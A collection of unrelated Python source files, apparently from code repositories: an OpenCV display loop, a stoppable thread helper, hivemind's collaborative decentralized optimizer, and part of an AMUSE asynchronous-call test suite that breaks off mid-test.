#cv2.namedWindow('FACE MASK AUTOMATION', cv2.WINDOW_FREERATIO)
#cv2.setWindowProperty('FACE MASK AUTOMATION ', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
hjk2 = cv2.resize(img, (1600, 840))
cv2.imshow("FACE MASK AUTOMATION", hjk2)
if cv2.waitKey(1) & 0xff == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
|
stoppable_thread.py
|
# Copyright 2015-2021 Espressif Systems (Shanghai) CO LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
try:
from typing import Optional
except ImportError:
pass
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
# type: () -> None
self._thread = None # type: Optional[threading.Thread]
@property
def alive(self):
# type: () -> bool
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
# type: () -> None
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
# type: () -> None
pass # override to provide cancellation functionality
def run(self):
# type: () -> None
pass # override for the main thread behaviour
def _run_outer(self):
# type: () -> None
try:
self.run()
finally:
self._thread = None
def stop(self):
# type: () -> None
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
|
collaborative.py
|
from __future__ import annotations
import logging
from dataclasses import dataclass
from threading import Event, Lock, Thread
from typing import Dict, Iterator, Optional
import numpy as np
import torch
from pydantic import BaseModel, StrictBool, StrictFloat, confloat, conint
from hivemind.dht import DHT
from hivemind.dht.crypto import RSASignatureValidator
from hivemind.dht.schema import BytesWithPublicKey, SchemaValidator
from hivemind.optim.base import DecentralizedOptimizerBase
from hivemind.optim.grad_scaler import HivemindGradScaler
from hivemind.optim.training_averager import TrainingAverager
from hivemind.utils import get_dht_time, get_logger
from hivemind.utils.performance_ema import PerformanceEMA
logger = get_logger(__name__)
LRSchedulerBase = getattr(torch.optim.lr_scheduler, "_LRScheduler", None)
@dataclass(frozen=False)
class CollaborationState:
optimizer_step: int
samples_accumulated: int
target_batch_size: int
num_peers: int
num_clients: int
eta_next_step: float
next_fetch_time: float
@property
def ready_for_step(self):
return self.samples_accumulated >= self.target_batch_size or get_dht_time() >= self.eta_next_step
def register_step(self, local_step: int):
self.optimizer_step = max(local_step, self.optimizer_step)
self.samples_accumulated = 0
self.eta_next_step = float("inf")
class TrainingState(BaseModel):
peer_id: bytes
step: conint(ge=0, strict=True)
samples_accumulated: conint(ge=0, strict=True)
samples_per_second: confloat(ge=0.0, strict=True)
time: StrictFloat
client_mode: StrictBool
class TrainingProgressSchema(BaseModel):
progress: Dict[BytesWithPublicKey, Optional[TrainingState]]
class CollaborativeOptimizer(DecentralizedOptimizerBase):
"""
An optimizer that performs model updates after collaboratively accumulating a target (large) batch size across peers.
These optimizers use DHT to track how much progress did the collaboration make towards target batch size.
Once enough samples were accumulated, optimizers will compute a weighted average of their statistics.
:note: **For new projects, please use hivemind.Optimizer**. CollaborativeOptimizer is an older version of that.
Currently, hivemind.Optimizer supports all the features of CollaborativeOptimizer and many advanced ones.
CollaborativeOptimizer will still be supported for a while, but it will be deprecated in v1.1.0.
:note: This optimizer behaves unlike regular pytorch optimizers in two ways:
* calling .step will periodically zero-out gradients w.r.t. model parameters after each step
* it may take multiple .step calls without updating model parameters, waiting for peers to accumulate enough samples
:param opt: a standard pytorch optimizer, preferably a large-batch one such as LAMB, LARS, etc.
:param dht: a running hivemind.DHT daemon connected to other peers
:param prefix: a common prefix for all metadata stored by CollaborativeOptimizer in the DHT
:param target_batch_size: perform optimizer step after all peers collectively accumulate this many samples
:param batch_size_per_step: before each call to .step, user should accumulate gradients over this many samples
:param min_refresh_period: wait for at least this many seconds before fetching new collaboration state
:param max_refresh_period: wait for at most this many seconds before fetching new collaboration state
:param default_refresh_period: if no peers are detected, attempt to fetch collaboration state this often (seconds)
:param expected_drift_peers: assume that this many new peers can join between steps
:param expected_drift_rate: assumes that this fraction of current collaboration can join/leave between steps
:note: The expected collaboration drift parameters are used to adjust the frequency with which this optimizer will
refresh the collaboration-wide statistics (to avoid missing the moment when to run the next step)
:param bandwidth: peer's network bandwidth for the purpose of load balancing (recommended: internet speed in mbps)
:param step_tolerance: a peer can temporarily be delayed by this many steps without being deemed out of sync
:param performance_ema_alpha: smoothing value used to estimate this peer's performance (training samples per second)
:param averaging_expiration: peer's requests for averaging will be valid for this many seconds
:param metadata_expiration: peer's metadata (e.g. samples processed) is stored onto DHT for this many seconds
:param averaging_timeout: if an averaging step hangs for this long, it will be cancelled.
:param load_state_timeout: wait for at most this many seconds before giving up on load_state_from_peers
:param scheduler: if specified, use this scheduler to update optimizer learning rate
:param reuse_grad_buffers: if True, use model's .grad buffers for gradient accumulation.
This is more memory efficient, but it requires that the user does *NOT* call model/opt zero_grad at all
:param accumulate_grads_on: if specified, accumulate gradients on this device. By default, this will use the same
device as model parameters. One can specify a different device (e.g. 'cpu' vs 'cuda') to save device memory at
the cost of extra time per step. If reuse_gradient_accumulators is True, this parameter has no effect.
:param client_mode: if True, runs training without incoming connections, in a firewall-compatible mode
:param kwargs: additional parameters forwarded to DecentralizedAverager
:note: If you are using CollaborativeOptimizer with lr_scheduler, it is recommended to pass this scheduler
explicitly into this class. Otherwise, scheduler may not be synchronized between peers.
"""
def __init__(
self,
opt: torch.optim.Optimizer,
*,
dht: DHT,
prefix: str,
target_batch_size: int,
batch_size_per_step: Optional[int] = None,
scheduler: Optional[LRSchedulerBase] = None,
min_refresh_period: float = 0.5,
max_refresh_period: float = 30,
default_refresh_period: float = 3,
expected_drift_peers: float = 3,
expected_drift_rate: float = 0.2,
performance_ema_alpha: float = 0.1,
metadata_expiration: float = 60.0,
averaging_timeout: Optional[float] = None,
load_state_timeout: float = 600.0,
step_tolerance: int = 1,
reuse_grad_buffers: bool = False,
accumulate_grads_on: Optional[torch.device] = None,
client_mode: bool = False,
verbose: bool = False,
**kwargs,
):
super().__init__(opt, dht)
signature_validator = RSASignatureValidator()
self._local_public_key = signature_validator.local_public_key
dht.add_validators([SchemaValidator(TrainingProgressSchema, prefix=prefix), signature_validator])
if reuse_grad_buffers and accumulate_grads_on is not None:
logger.warning("Setting 'accumulate_grads_on' has no effect if reuse_grad_buffers=True")
self.prefix, self.scheduler = prefix, scheduler
self.target_batch_size, self.batch_size_per_step = target_batch_size, batch_size_per_step
self.min_refresh_period, self.max_refresh_period, self.default_refresh_period = (
min_refresh_period,
max_refresh_period,
default_refresh_period,
)
self.expected_drift_peers, self.expected_drift_rate = expected_drift_peers, expected_drift_rate
self.averaging_timeout = averaging_timeout
self.load_state_timeout = load_state_timeout
self.metadata_expiration = metadata_expiration
self._grads, self.reuse_grad_buffers, self.accumulate_grads_on = None, reuse_grad_buffers, accumulate_grads_on
self.client_mode, self.step_tolerance = client_mode, step_tolerance
self.status_loglevel = logging.INFO if verbose else logging.DEBUG
self.averager = self._make_averager(**kwargs)
self._step_supports_amp_scaling = self.reuse_grad_buffers # enable custom execution with torch GradScaler
self.training_progress_key = f"{self.prefix}_progress"
self.local_samples_accumulated = 0 # a number of local samples accumulated since last optimizer update
self.local_updates_accumulated = 0 # a number of calls to step() since last optimizer update
self.performance_ema = PerformanceEMA(alpha=performance_ema_alpha)
self.last_step_time = None
self.collaboration_state = self._fetch_state()
self.lock_collaboration_state, self.collaboration_state_updated = Lock(), Event()
self.lock_local_progress, self.should_report_progress = Lock(), Event()
self.progress_reporter = Thread(target=self.report_training_progress, daemon=True, name=f"{self}.reporter")
self.progress_reporter.start()
self.collaboration_state_updater = Thread(
target=self.check_collaboration_state_periodically, daemon=True, name=f"{self}.collaboration_state_updater"
)
self.collaboration_state_updater.start()
def _make_averager(self, **kwargs):
return TrainingAverager(
self.opt,
dht=self.dht,
average_parameters=True,
average_gradients=True,
prefix=f"{self.prefix}_averaging",
allreduce_timeout=self.averaging_timeout,
client_mode=self.client_mode,
**kwargs,
)
@property
def local_step(self) -> int:
return self.averager.local_step
@property
def is_synchronized(self) -> bool:
return self.local_step >= self.collaboration_state.optimizer_step
@property
def is_within_tolerance(self) -> bool:
return self.local_step >= self.collaboration_state.optimizer_step - self.step_tolerance
def is_alive(self) -> bool:
return self.averager.is_alive()
def load_state_from_peers(self, **kwargs):
"""Attempt to fetch the newest collaboration state from other peers"""
with self.lock_collaboration_state:
while True:
try:
self.averager.load_state_from_peers(timeout=self.load_state_timeout, **kwargs)
break
except KeyboardInterrupt:
raise
except BaseException as e:
logger.exception(f"Failed to load state from peers: {e}, retrying ...")
continue
self.local_samples_accumulated = self.local_updates_accumulated = 0
self.reset_accumulated_grads_()
self.update_scheduler()
def state_dict(self) -> dict:
state_dict = super().state_dict()
state_dict["state"]["collaborative_step"] = self.local_step
return state_dict
def load_state_dict(self, state_dict: dict):
if "collaborative_step" in state_dict["state"]:
self.averager.local_step = state_dict["state"].pop("collaborative_step")
return super().load_state_dict(state_dict)
def step(self, batch_size: Optional[int] = None, grad_scaler: Optional[HivemindGradScaler] = None, **kwargs):
"""
Report accumulating gradients w.r.t. batch_size additional samples, optionally update model parameters
:param batch_size: optional override for batch_size_per_step from init
:param grad_scaler: if amp is enabled, this **must** be a hivemind-aware gradient scaler
:note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details.
"""
if grad_scaler is not None and not isinstance(grad_scaler, HivemindGradScaler):
raise ValueError("CollaborativeOptimizer requires a hivemind-aware gradient scaler (HivemindGradScaler)")
if self.batch_size_per_step is None:
if batch_size is None:
raise ValueError("Please either set batch_size_per_step parameter at init or when calling .step")
logger.log(self.status_loglevel, f"Setting default batch_size_per_step to {batch_size}")
self.batch_size_per_step = batch_size
batch_size = batch_size if batch_size is not None else self.batch_size_per_step
if not self.is_synchronized and not self.is_within_tolerance:
logger.log(self.status_loglevel, "Peer is out of sync")
self.load_state_from_peers()
return
elif not self.is_synchronized and self.is_within_tolerance:
self.averager.local_step = self.collaboration_state.optimizer_step
logger.log(self.status_loglevel, f"Catching up with collaboration step {self.local_step}")
if grad_scaler is not None and not grad_scaler.are_grads_finite(self):
logger.log(self.status_loglevel, "Encountered incorrect value in fp16 grads, resetting local gradients")
self.local_samples_accumulated = self.local_steps_accumulated = 0
self.reset_accumulated_grads_()
self.should_report_progress.set()
return
if self.last_step_time is not None and get_dht_time() - self.last_step_time > self.metadata_expiration:
logger.warning(
f"Training step took {get_dht_time() - self.last_step_time}, "
f"but metadata expired in {self.metadata_expiration} s."
)
self.accumulate_grads_(batch_size)
with self.lock_local_progress:
self.local_samples_accumulated += batch_size
self.local_updates_accumulated += 1
self.performance_ema.update(task_size=batch_size)
self.should_report_progress.set()
if not self.collaboration_state.ready_for_step:
return
logger.log(self.status_loglevel, f"Beginning global optimizer step #{self.collaboration_state.optimizer_step}")
with self.performance_ema.pause(), self.lock_collaboration_state:
self.collaboration_state = self._fetch_state()
self.collaboration_state_updated.set()
# divide accumulators by local steps to recover the true average grad w.r.t. local_samples_accumulated
self.apply_accumulated_grads_(scale_by=1.0 / self.local_updates_accumulated)
if grad_scaler is not None:
with grad_scaler.running_global_step():
assert grad_scaler.unscale_(self)
current_step, group_info = self.averager.local_step, None
if self.collaboration_state.num_peers > 1:
mean_samples_per_worker = self.target_batch_size / self.collaboration_state.num_peers
weight = self.local_samples_accumulated / mean_samples_per_worker
try:
group_info = self.averager.step(
weight=weight, gather=current_step, timeout=self.averaging_timeout, **kwargs
)
if group_info:
logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers")
# update our current step if we averaged with another peer that was at a more recent step
for peer, peer_step in group_info.items():
if isinstance(peer_step, int):
current_step = max(current_step, peer_step)
else:
logger.warning(f"Peer {peer} sent malformed data about current step: {peer_step}")
except BaseException as e:
logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}")
else:
logger.log(
self.status_loglevel,
f"Skipped averaging: collaboration consists of " f"{self.collaboration_state.num_peers} peer(s)",
)
if grad_scaler is not None:
with grad_scaler.running_global_step():
assert grad_scaler.step(self)
else:
self.opt.step()
self.reset_accumulated_grads_()
self.local_samples_accumulated = self.local_updates_accumulated = 0
self.collaboration_state.register_step(current_step + 1)
self.averager.local_step = current_step + 1
self.collaboration_state_updated.set()
self.update_scheduler()
if grad_scaler is not None:
with grad_scaler.running_global_step():
assert grad_scaler.update()
if not self.averager.client_mode:
self.averager.state_sharing_priority = self.local_step
logger.log(self.status_loglevel, f"Optimizer step: done!")
return group_info
def step_aux(self, **kwargs):
"""
Find and assist other peers in averaging without sending local gradients.
:note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details.
"""
if not self.collaboration_state.ready_for_step:
return
logger.log(self.status_loglevel, f"Beginning global optimizer step #{self.collaboration_state.optimizer_step}")
self.collaboration_state = self._fetch_state()
self.collaboration_state_updated.set()
with self.lock_collaboration_state:
current_step, group_info = self.averager.local_step, None
try:
group_info = self.averager.step(timeout=self.averaging_timeout, gather=current_step, **kwargs)
if group_info:
logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers")
# update our current step if we averaged with another peer that was at a more recent step
for peer, peer_step in group_info.items():
if isinstance(peer_step, int):
current_step = max(current_step, peer_step)
else:
logger.warning(f"Peer {peer} sent malformed data about current step: {peer_step}")
except BaseException as e:
logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}")
self.collaboration_state.register_step(current_step + 1)
self.averager.local_step = current_step + 1
self.collaboration_state_updated.set()
logger.log(self.status_loglevel, f"Optimizer step: done!")
return group_info
def _grad_buffers(self) -> Iterator[torch.Tensor]:
"""pytorch-internal gradient buffers"""
for param_group in self.opt.param_groups:
for param in param_group["params"]:
if param.grad is None:
yield torch.zeros_like(param)
else:
yield param.grad
@torch.no_grad()
def accumulated_grads(self) -> Iterator[torch.Tensor]:
"""local gradient accumulators"""
if self.reuse_grad_buffers:
yield from self._grad_buffers()
return
if self._grads is None:
self._grads = [torch.zeros_like(grad, device=self.accumulate_grads_on) for grad in self._grad_buffers()]
yield from self._grads
@torch.no_grad()
def accumulate_grads_(self, batch_size: int):
"""add current gradients to grad accumulators (if any)"""
if self.reuse_grad_buffers:
# user is responsible for accumulating gradients in .grad buffers
assert batch_size == self.batch_size_per_step, "Custom batch size is not supported if reuse_grad_buffers"
else:
alpha = float(batch_size) / self.batch_size_per_step
for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()):
grad_acc.add_(grad_buf.to(grad_acc.device), alpha=alpha)
@torch.no_grad()
def apply_accumulated_grads_(self, scale_by: Optional[float] = None):
if not self.reuse_grad_buffers:
for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()):
grad_buf.copy_(grad_acc.to(grad_buf.device), non_blocking=True)
if scale_by is not None:
for grad_buf in self._grad_buffers():
grad_buf.mul_(scale_by)
@torch.no_grad()
def reset_accumulated_grads_(self):
for grad_buf in self.accumulated_grads():
grad_buf.zero_()
def report_training_progress(self):
"""Periodically publish metadata and the current number of samples accumulated towards the next step"""
while self.is_alive():
self.should_report_progress.wait()
self.should_report_progress.clear()
with self.lock_local_progress:
current_time = get_dht_time()
local_state_info = TrainingState(
peer_id=self.averager.peer_id.to_bytes(),
step=self.local_step,
samples_accumulated=self.local_samples_accumulated,
samples_per_second=self.performance_ema.samples_per_second,
time=current_time,
client_mode=self.averager.client_mode,
)
self.dht.store(
key=self.training_progress_key,
subkey=self._local_public_key,
value=local_state_info.dict(),
expiration_time=current_time + self.metadata_expiration,
return_future=True,
)
def check_collaboration_state_periodically(self):
"""
Periodically check the training progress from all peers. Trigger update after target_batch_size total samples
"""
while self.is_alive():
time_to_next_update = max(0.0, self.collaboration_state.next_fetch_time - get_dht_time())
if self.collaboration_state_updated.wait(time_to_next_update):
self.collaboration_state_updated.clear()
continue # if state was updated externally, reset timer
with self.lock_collaboration_state:
self.collaboration_state = self._fetch_state()
def _fetch_state(self) -> CollaborationState:
"""Read performance statistics reported by peers, estimate progress towards next batch"""
response, _expiration = self.dht.get(self.training_progress_key, latest=True) or (None, -float("inf"))
current_time = get_dht_time()
if not isinstance(response, dict) or len(response) == 0:
logger.log(self.status_loglevel, f"Found no active peers: {response}")
samples_left_to_target_batch_size = max(0, self.target_batch_size - self.local_samples_accumulated)
local_eta_next_step = samples_left_to_target_batch_size / self.performance_ema.samples_per_second
return CollaborationState(
self.local_step,
self.local_samples_accumulated,
self.target_batch_size,
num_peers=0,
num_clients=0,
eta_next_step=current_time + local_eta_next_step,
next_fetch_time=current_time + self.default_refresh_period,
)
valid_peer_states = [
TrainingState.parse_obj(peer_state.value)
for peer_state in response.values()
if peer_state.value is not None
]
num_peers = len(valid_peer_states)
num_clients = sum(state.client_mode for state in valid_peer_states)
global_optimizer_step = self.local_step
for state in valid_peer_states:
if not state.client_mode:
global_optimizer_step = max(global_optimizer_step, state.step)
total_samples_accumulated = estimated_current_samples = total_samples_per_second = 0
for state in valid_peer_states:
total_samples_per_second += state.samples_per_second
if state.step == global_optimizer_step:
total_samples_accumulated += state.samples_accumulated
estimated_current_samples += (
state.samples_accumulated + max(0, current_time - state.time) * state.samples_per_second
)
# note: we deliberately count only valid peers for samples_accumulated, but all peers for performance;
# the rationale behind this is that outdated peers will synchronize and begin contributing shortly.
estimated_samples_remaining = self.target_batch_size - estimated_current_samples
estimated_time_to_next_step = max(0, estimated_samples_remaining) / total_samples_per_second
expected_max_peers = max(num_peers + self.expected_drift_peers, num_peers * (1 + self.expected_drift_rate))
time_to_next_fetch = float(
np.clip(
a=estimated_time_to_next_step * num_peers / expected_max_peers,
a_min=self.min_refresh_period,
a_max=self.max_refresh_period,
)
)
logger.log(
self.status_loglevel,
f"{self.prefix} accumulated {total_samples_accumulated} samples from "
f"{num_peers} peers for step #{global_optimizer_step}. "
f"ETA {estimated_time_to_next_step:.2f} sec (refresh in {time_to_next_fetch:.2f} sec)",
)
return CollaborationState(
global_optimizer_step,
total_samples_accumulated,
target_batch_size=self.target_batch_size,
num_peers=num_peers,
num_clients=num_clients,
eta_next_step=current_time + estimated_time_to_next_step,
next_fetch_time=current_time + time_to_next_fetch,
)
def zero_grad(self, *args, **kwargs):
if self.reuse_grad_buffers:
raise ValueError(
f"When running {self.__class__.__name__} with reuse_grad_buffers=True, user should never "
f"call zero_grad manually. Gradients will be refreshed internally."
)
return self.opt.zero_grad(*args, **kwargs)
def update_scheduler(self):
if self.scheduler:
while self.scheduler._step_count < self.local_step:
self.scheduler.step()
def shutdown(self):
logger.debug("Shutting down averager...")
self.averager.shutdown()
logger.debug("Sending goodbye to peers...")
self.dht.store(
self.training_progress_key,
subkey=self._local_public_key,
value=None,
expiration_time=get_dht_time() + self.metadata_expiration,
)
logger.debug(f"{self.__class__.__name__} is shut down")
def __del__(self):
self.shutdown()
|
test_async.py
|
from amuse.support.interface import InCodeComponentImplementation
from amuse.test.amusetest import TestWithMPI
from amuse.support import exceptions
from amuse.support import options
import os
import time
from amuse.units import nbody_system
from amuse.units import units
from amuse import datamodel
from amuse.rfi.tools import create_c
from amuse.rfi import async_request
from amuse.rfi.core import *
import test_c_implementation
from amuse.test import compile_tools
from amuse.community.distributed.interface import DistributedAmuse, Pilot
codestring=test_c_implementation.codestring+"""
#include <unistd.h>
float _x[10] = { 1., 2., 3., 4., 5., 6., 7., 8., 9., 10.};
int do_sleep(int in) {
sleep(in);
return 0;
}
int return_error(int * out) {
*out=123;
return -1;
}
int get_x(int in, float *x){
*x=_x[in];
return 0;
}
int set_x(int in, float x){
_x[in]=x;
return 0;
}
int dummy(){
return 0;
}
"""
class ForTestingInterface(test_c_implementation.ForTestingInterface):
@legacy_function
def do_sleep():
function = LegacyFunctionSpecification()
function.addParameter('int_in', dtype='int32', direction=function.IN)
function.result_type = 'int32'
return function
@legacy_function
def return_error():
function = LegacyFunctionSpecification()
function.addParameter('out', dtype='int32', direction=function.OUT)
function.result_type = 'int32'
return function
@legacy_function
def echo_2_int():
function = LegacyFunctionSpecification()
function.addParameter('int_in1', dtype='int32', direction=function.IN, unit=units.m)
function.addParameter('int_in2', dtype='int32', direction=function.IN, default = 1, unit=units.kg)
function.addParameter('int_out1', dtype='int32', direction=function.OUT, unit=units.m)
function.addParameter('int_out2', dtype='int32', direction=function.OUT, unit=units.kg)
function.addParameter('len', dtype='int32', direction=function.LENGTH)
function.result_type = 'int32'
function.must_handle_array = True
return function
@legacy_function
def get_x():
function = LegacyFunctionSpecification()
function.addParameter('index', dtype='int32', direction=function.IN)
function.addParameter('x', dtype='float32', direction=function.OUT, unit=units.m)
function.result_type = 'int32'
function.can_handle_array = True
return function
@legacy_function
def set_x():
function = LegacyFunctionSpecification()
function.addParameter('index', dtype='int32', direction=function.IN)
function.addParameter('x', dtype='float32', direction=function.IN, unit=units.m)
function.result_type = 'int32'
function.can_handle_array = True
return function
@legacy_function
def dummy():
function = LegacyFunctionSpecification()
function.result_type = 'int32'
return function
class ForTesting(InCodeComponentImplementation):
def __init__(self, exefile, **options):
InCodeComponentImplementation.__init__(self, ForTestingInterface(exefile, **options), **options)
def get_grid_range(self):
return (0,9)
def define_grids(self, handler):
handler.define_grid('grid')
handler.set_grid_range('grid', 'get_grid_range')
handler.add_getter('grid', 'get_x', names=["x"])
handler.add_setter('grid', 'set_x', names=["x"])
class ForTestingWithState(ForTesting):
def define_state(self, handler):
handler.set_initial_state("1")
handler.add_transition("1", "2", "dummy")
handler.add_method("2", "get_x")
handler.add_method("2", "set_x")
class TestASync(TestWithMPI):
@classmethod
def setup_class(cls):
print("building...")
cls.check_can_compile_modules()
try:
cls.exefile = compile_tools.build_worker(codestring, cls.get_path_to_results(), ForTestingInterface)
except Exception as ex:
print ex
raise
print("done")
def test1(self):
instance = ForTestingInterface(self.exefile)
int_out, error = instance.echo_int(10)
instance.stop()
self.assertEquals(int_out, 10)
self.assertEquals(error, 0)
def test2(self):
instance = ForTestingInterface(self.exefile)
request = instance.echo_int.asynchronous(10)
self.assertEqual(request, instance.async_request)
request.wait()
int_out,error=request.result()
self.assertEquals(int_out, 10)
self.assertEquals(error, 0)
instance.stop()
def test3(self):
instance = ForTestingInterface(self.exefile)
request1 = instance.do_sleep.asynchronous(1)
request2 = instance.echo_int.asynchronous(10)
self.assertEqual(request2, instance.async_request)
request2.wait()
int_out,error=request2.result()
self.assertEquals(int_out, 10)
self.assertEquals(error, 0)
instance.stop()
def test4(self):
instance = ForTesting(self.exefile)
request1 = instance.do_sleep(1, return_request=True)
request2 = instance.echo_int(10, return_request=True)
self.assertEqual(request2, instance.async_request)
instance.async_request.wait()
int_out=request2.result()
self.assertEquals(int_out, 10)
instance.stop()
def test5(self):
instance = ForTesting(self.exefile)
instance.do_sleep(1, return_request=True)
requests=[]
for x in range(10):
requests.append(instance.echo_int(x, return_request=True))
instance.async_request.wait()
for i,x in enumerate(requests):
self.assertEquals(x.result(), i)
instance.stop()
def test6(self):
instance = ForTesting(self.exefile)
requests=[]
for x in range(10):
requests.append(instance.echo_int(x, return_request=True))
instance.async_request.wait()
for i,x in enumerate(requests):
self.assertEquals(x.result(), i)
instance.stop()
def test7(self):
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
t1=time.time()
requests=[]
for x in range(10):
requests.append([instance1.echo_int(x, return_request=True),x])
for x in range(10):
requests.append([instance2.echo_int(x, return_request=True),x])
instance1.do_sleep(1, return_request=True)
instance2.do_sleep(1, return_request=True)
pool=instance1.async_request.join(instance2.async_request)
pool.waitall()
t2=time.time()
for x in requests:
self.assertEquals(x[0].result(), x[1])
instance1.stop()
instance2.stop()
self.assertTrue(t2-t1 < 2.)
def test8(self):
from threading import Thread
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
t1=time.time()
requests=[]
for x in range(10):
requests.append([instance1.echo_int(x, return_request=True),x])
for x in range(10):
requests.append([instance2.echo_int(x, return_request=True),x])
instance1.do_sleep(1, return_request=True)
instance2.do_sleep(1, return_request=True)
pool=instance1.async_request.join(instance2.async_request)
thread=Thread(target=pool.waitall)
thread.start()
time.sleep(1)
thread.join()
self.assertTrue(pool)
t2=time.time()
for x in requests:
self.assertEquals(x[0].result(), x[1])
instance1.stop()
instance2.stop()
self.assertTrue(t2-t1 < 2.)
def test9(self):
instance = ForTesting(self.exefile)
for x in range(10):
instance.echo_int(x, return_request=True)
results=instance.async_request.results
self.assertEquals(results, range(10))
instance.stop()
def test10(self):
instance = ForTesting(self.exefile)
r1=instance.do_sleep(1, return_request=True)
r2=instance.return_error( return_request=True)
r3=instance.echo_int(1, return_request=True)
r4=instance.echo_int(2, return_request=True)
self.assertRaises(Exception, instance.async_request.waitall,
expected_message="Error in dependent call: Error when calling 'return_error' of a 'ForTesting', errorcode is -1")
self.assertTrue( r1.is_result_available() )
self.assertFalse( r2.is_result_available() )
self.assertTrue( r2.is_finished )
self.assertTrue( r3.is_finished )
self.assertFalse( bool(r3) )
self.assertTrue( r4.is_finished )
self.assertTrue( r4.waits_for() is None )
self.assertFalse( r3.is_result_available() )
instance.stop()
def test11(self):
""" cross dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
def fac():
return instance2.echo_int(20, return_request=True)
#~ request2=instance2.echo_int(20, async_dependency=request1)
request2=async_request.DependentASyncRequest(request1, fac)
request2.wait()
self.assertEqual(request2.result(),20)
instance1.stop()
instance2.stop()
def test11b(self):
""" cross dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance2.echo_int(20, async_dependency=request1, return_request=True)
request2.wait()
self.assertTrue(request1.is_result_available())
self.assertEqual(request2.result(),20)
instance1.stop()
instance2.stop()
def test12(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
results=dict()
def safe_result(arg, index):
result=arg()
results[index]=result
return result
request1.add_result_handler(safe_result,(1,))
def fac():
return instance2.echo_int(results[1], return_request=True)
#~ request2=instance2.echo_int(??, async_factory=fac)
request2=async_request.DependentASyncRequest(request1, fac)
request2.wait()
self.assertEqual( request2.result(), 10)
instance1.stop()
instance2.stop()
def test12b(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_int(10, return_request=True)
request2=instance2.echo_int(request1, return_request=True)
request2.wait()
self.assertEqual( request2.result(), 10)
instance1.stop()
instance2.stop()
def test12c(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(1 | units.m , 2 | units.kg, return_request=True)
request2=instance2.echo_2_int(request1[0], request1[1], return_request=True)
print "do...wait..."
request2.wait()
print "done", request2.result()
self.assertEqual( request2.result()[0], 1 | units.m)
self.assertEqual( request2.result()[1], 2 | units.kg)
instance1.stop()
instance2.stop()
def test12c(self):
""" cross dependency with input-output dependency """
instance1 = ForTesting(self.exefile)
instance2 = ForTesting(self.exefile)
instance3 = ForTesting(self.exefile)
instance4 = ForTesting(self.exefile)
instance1.do_sleep(1, return_request=True)
request1=instance1.echo_2_int(1 | units.m , 2 | units.kg, return_request=True)
request1b=instance1.do_sleep(1, return_request=True)
request2=instance2.echo_2_int(3 | units.m , 4 | units.kg, return_request=True)
request3=instance3.echo_2_int(request2[0] , 5 | units.kg, return_request=True)
instance4.do_sleep(1, return_request=True)
request4=instance4.echo_2_int(request2[0], request3[1], return_request=True, async_dependency=request1b)
request3.wait()
self.assertEqual( request4.result()[0], 3 | units.m)
self.assertEqual( request4.result()[1], 5 | units.kg)
instance1.stop()
instance2.stop()
instance3.stop()
instance4.stop()
def test13(self):
instance = ForTesting(self.exefile)
r=instance.echo_int(1, return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
r.result()
r=instance.return_error(return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
self.assertTrue(r.is_result_available())
self.assertRaises(Exception, r.result, expected_message="Error when calling 'return_error' of a 'ForTesting', errorcode is -1")
self.assertFalse(r.is_result_available())
self.assertTrue(r.is_finished)
instance.stop()
def test14(self):
instance = ForTesting(self.exefile, channel_type="sockets")
r=instance.echo_int(1, return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
r.result()
r=instance.return_error(return_request=True)
time.sleep(0.1)
self.assertTrue(r.is_result_available())
self.assertTrue(r.is_result_available())
self.assertRaises(Exception, r.result, expected_message="Error when calling 'return_error' of a 'ForTesting', errorcode is -1")
self.assertFalse(r.is_result_available())
self.assertTrue(r.is_finished)
instance.stop()
def test15(self):
instance = ForTesting(self.exefile)
instance.do_sleep(1, return_request=True)
instance.return_error( return_request=True)
instance.echo_int(1, return_request=True)
instance.echo_int(1, return_request=True)
#~ self.assertRinstance.echo_int(1)
instance.stop()
def test16(self):
instance = ForTesting(self.exefile)
instance.do_sleep(1, return_request=True)
result=instance.echo_2_int([11,12,13] | units.m,[3,2,1]| units.kg, return_request=True)
r1=result[0]
r2=result[1]
self.assertEquals(r1.result(),[11,12,13] | units.m)
